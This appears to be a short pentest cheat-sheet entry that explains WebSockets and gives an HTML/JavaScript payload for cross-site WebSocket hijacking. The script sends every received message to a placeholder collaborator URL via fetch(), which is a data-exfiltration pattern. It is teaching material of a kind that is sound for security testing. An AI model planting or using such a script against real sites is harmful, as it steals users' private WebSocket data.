What is Web Socket

WebSocket is a communication protocol that provides a full-duplex, bidirectional communication channel over a single, long-lived connection between a client (usually a web browser) and a server. Unlike traditional HTTP, which follows a request-response model, WebSockets allow real-time data exchange without the need for repeated requests.

Exploits

WebSocket can be vulnerable to similar issues that HTTP faces. These vulnerabilities often arise from improper implementation or insufficient security measures, emphasizing the need for robust practices such as proper authentication, encryption, and validation to ensure secure communication.

# Cross-site WebSocket hijacking (Lack of CSRF)

The following code allow you to retrieve some web socket communication using cross-site vulnerability

<script> 
	var ws = new WebSocket('wss://your-websocket-url'); 
	ws.onopen = function() { 
		ws.send("READY"); 
	}; 
	
	ws.onmessage = function(event) { 
		fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data}); 
	}; 
</script>